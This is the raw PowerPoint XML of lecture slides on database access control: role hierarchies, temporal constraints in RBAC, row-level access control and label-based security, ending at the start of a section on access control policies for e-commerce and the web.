            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6948642" y="6142451"/>
              <a:ext cx="149100" cy="189598"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/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7" name="矩形 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7971606" y="5705599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8" name="矩形 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7971606" y="5858053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19" name="矩形 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7971606" y="6010508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20" name="矩形 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7971606" y="6162962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47121" name="矩形 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7971606" y="6315416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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="47122" name="直線單箭頭接點 17"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="47115" idx="6"/>
              <a:endCxn id="25" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="6029232" y="5889132"/>
              <a:ext cx="919410" cy="100865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7123" name="直線單箭頭接點 21"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="47115" idx="6"/>
              <a:endCxn id="28" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6029232" y="5989997"/>
              <a:ext cx="919410" cy="356335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7124" name="直線單箭頭接點 25"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="47116" idx="6"/>
              <a:endCxn id="26" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="6029232" y="6041532"/>
              <a:ext cx="919410" cy="195718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7125" name="直線單箭頭接點 29"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="47114" idx="6"/>
              <a:endCxn id="24" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6029232" y="5705600"/>
              <a:ext cx="907682" cy="31132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7126" name="直線單箭頭接點 32"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:endCxn id="26" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6029232" y="5718916"/>
              <a:ext cx="907682" cy="322616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sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="文字方塊 1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5397348" y="5297409"/>
              <a:ext cx="130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b="1" baseline="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Privileges</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" baseline="0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橢圓 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="5921232" y="5682732"/>
              <a:ext cx="108000" cy="108000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5" name="橢圓 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="5921232" y="5835132"/>
              <a:ext cx="108000" cy="108000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6" name="橢圓 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="5921232" y="5987532"/>
              <a:ext cx="108000" cy="108000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7" name="橢圓 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="5921232" y="6139932"/>
              <a:ext cx="108000" cy="108000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8" name="橢圓 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="5921232" y="6292332"/>
              <a:ext cx="108000" cy="108000"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="39" name="直線單箭頭接點 21"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="47117" idx="1"/>
              <a:endCxn id="47114" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="7158049" y="5705600"/>
              <a:ext cx="813557" cy="47399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3" name="直線單箭頭接點 21"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="47118" idx="1"/>
              <a:endCxn id="47115" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="7097742" y="5905453"/>
              <a:ext cx="873864" cy="84544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6" name="直線單箭頭接點 21"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="47119" idx="1"/>
              <a:endCxn id="47116" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="7097742" y="6057908"/>
              <a:ext cx="873864" cy="179342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49" name="直線單箭頭接點 21"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="47120" idx="1"/>
              <a:endCxn id="47114" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="7125665" y="5772633"/>
              <a:ext cx="845941" cy="437729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52" name="直線單箭頭接點 21"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="47121" idx="1"/>
              <a:endCxn id="47116" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="7097742" y="6237250"/>
              <a:ext cx="873864" cy="125566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56" name="直線單箭頭接點 32"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="47114" idx="6"/>
              <a:endCxn id="27" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6029232" y="5705600"/>
              <a:ext cx="907682" cy="488332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206B53A-0DD7-472F-92CE-4D018436D38C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Role Hierarchy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1841500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Role hierarchy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>is a natural way of organizing roles to reflect the organization’s lines of authority and responsibility.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If a user has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one role</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>, the user automatically has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roles lower in the hierarchy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48133" name="文字方塊 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1866900" y="4591050"/>
            <a:ext cx="134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aseline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employee</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48134" name="文字方塊 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1866900" y="3887788"/>
            <a:ext cx="134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manager</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48135" name="文字方塊 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1866900" y="3209925"/>
            <a:ext cx="134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aseline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executive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48136" name="直線單箭頭接點 8"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="48135" idx="2"/>
            <a:endCxn id="48134" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="2400301" y="3749675"/>
            <a:ext cx="277812" cy="1587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48137" name="直線單箭頭接點 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="48134" idx="2"/>
            <a:endCxn id="48133" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="2388394" y="4439444"/>
            <a:ext cx="301625" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575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48138" name="矩形 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3929063" y="4037013"/>
            <a:ext cx="15398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800" b="1" baseline="0" dirty="0" err="1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hsucc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="28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:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="28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manager</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1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  <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48139" name="群組 11"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6351588" y="3465513"/>
            <a:ext cx="1209675" cy="787400"/>
            <a:chOff x="3648075" y="5114927"/>
            <a:chExt cx="1209675" cy="787646"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48143" name="圓柱 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3648075" y="5114927"/>
              <a:ext cx="1209675" cy="787646"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst>
                <a:gd name="adj" fmla="val 25000"/>
              </a:avLst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48144" name="文字方塊 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3771901" y="5270172"/>
              <a:ext cx="10287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data</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US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15" name="左-右雙向箭號 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5360988" y="3690938"/>
            <a:ext cx="790575" cy="39687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indent="-609600">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48141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6213" y="3044825"/>
            <a:ext cx="11906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42" name="矩形 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1655763" y="5221288"/>
            <a:ext cx="2103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Role Hierarchy </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill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5690F-F204-4A74-AAB5-449F95302574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122238"/>
            <a:ext cx="8924925" cy="8842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Temporal Constraints and Web-base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>AP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915988"/>
            <a:ext cx="8774113" cy="3275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Another important consideration in RBAC is the possible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>temporal constraints </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>that may exist on roles, such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time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體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duration of role activations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>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timed triggering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>of a role by an activation of another role.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Using an RBAC model is highly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desirable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> goal for addressing the key security requirements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Web-based applications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Discretionary access control (DAC) and mandatory access control (MAC)  models </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>lack capabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>needed to support the security requirements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emerging enterprises </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體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Web-based applications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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49157" name="矩形 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2840038" y="5213350"/>
            <a:ext cx="15398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2800" b="1" baseline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hsucc:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="1" baseline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manager</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1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  <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="49158" name="群組 11"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5262563" y="4641850"/>
            <a:ext cx="1209675" cy="787400"/>
            <a:chOff x="3648075" y="5114927"/>
            <a:chExt cx="1209675" cy="787646"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49162" name="圓柱 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3648075" y="5114927"/>
              <a:ext cx="1209675" cy="787646"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst>
                <a:gd name="adj" fmla="val 25000"/>
              </a:avLst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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49163" name="文字方塊 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3771901" y="5270172"/>
              <a:ext cx="10287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aseline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data</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" baseline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9" name="左-右雙向箭號 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4271963" y="4867275"/>
            <a:ext cx="790575" cy="39687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609600" indent="-609600">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-TW" altLang="en-US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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49160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188" y="4221163"/>
            <a:ext cx="11906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1" name="文字方塊 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2422525" y="6056313"/>
            <a:ext cx="2760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(2010/1/1~2012/12/31)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill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48C094-2AAF-4C57-9C73-27240E1CB5CF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22238"/>
            <a:ext cx="8774112" cy="1036637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Label-Based Security and Row-Level Access Control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317341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ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Row-level access control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400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Access control can be implemented by considering the data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row by row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Each data row is given a label</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>, storing information about data sensitivity.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user having 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low authorization level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>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denied</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> access to data having 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higher-level number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Suppose a user has SELECT privileges. If the user has a sensitivity of 20, then the user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can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> view all rows having a security level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of 20 or lower</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50182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6807" y="4487601"/>
            <a:ext cx="107791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文字方塊 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1617189" y="5498241"/>
            <a:ext cx="1190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rPr>
              <a:t>Level: 20</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" baseline="0" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="新細明體" charset="-120"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204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90562" y="4034553"/>
            <a:ext cx="4556401" cy="2305260"/>
            <a:chOff x="2890562" y="4034553"/>
            <a:chExt cx="4556401" cy="2305260"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="50181" name="群組 4"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2890562" y="4034553"/>
              <a:ext cx="4556401" cy="2305260"/>
              <a:chOff x="4824413" y="5432425"/>
              <a:chExt cx="3276600" cy="1247775"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="5018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24413" y="5432425"/>
                <a:ext cx="2905125" cy="1247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pic>
            <p:nvPicPr>
              <p:cNvPr id="50186" name="Picture 2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0488" y="5610225"/>
                <a:ext cx="390525" cy="10477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2723" y="4512083"/>
              <a:ext cx="424801" cy="184080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1021" y="4756871"/>
              <a:ext cx="228204" cy="176674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0823" y="5047858"/>
              <a:ext cx="228600" cy="17145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90823" y="5289866"/>
              <a:ext cx="228600" cy="1714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90823" y="5516922"/>
              <a:ext cx="228600" cy="2000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5586" y="6009211"/>
              <a:ext cx="219075" cy="1809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90823" y="5782116"/>
              <a:ext cx="228600" cy="16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>
          <a:xfrm>
            <a:off x="284163" y="122238"/>
            <a:ext cx="8774112" cy="611187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Label-Based Security</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:ea typeface="新細明體" charset="-120"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr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>
          <a:xfrm>
            <a:off x="284163" y="796925"/>
            <a:ext cx="8774112" cy="3740150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ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>A policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>defined by an administrator is called a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Label Security policy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When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 policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>is implemented,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 new column </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>is added to each row. The added column contains the label for each row that reflects the sensitivity of the row.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Label Security requirements are applied on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top of the DAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>requirements.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The user must satisfy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DAC requirements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>and then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label security requirements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> to access a row.</a:t>
            </a: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29650" y="6386513"/>
            <a:ext cx="428625" cy="387350"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{61852385-5570-4900-8878-F22AFE9887D3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811713"/>
            <a:ext cx="2905125" cy="1247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0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4811713"/>
            <a:ext cx="2838450" cy="121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07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6125" y="5002213"/>
            <a:ext cx="247650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08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4250" y="5002213"/>
            <a:ext cx="247650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209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1900" y="4992688"/>
            <a:ext cx="247650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10" name="文字方塊 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7034664" y="4709414"/>
            <a:ext cx="927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 dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Levels</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" baseline="0" dirty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066181" y="5936001"/>
            <a:ext cx="86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baseline="0" dirty="0"/>
              <a:t>A    B    C</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" baseline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8CF0C5C-7DD3-4CC7-B062-639D8205430E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3.3 Access Control Policies for</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> E-Commerce and the Web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2578100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ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>E-Commerce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>environments require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elaborate policies </a:t>
            </a:r>
            <a:r>
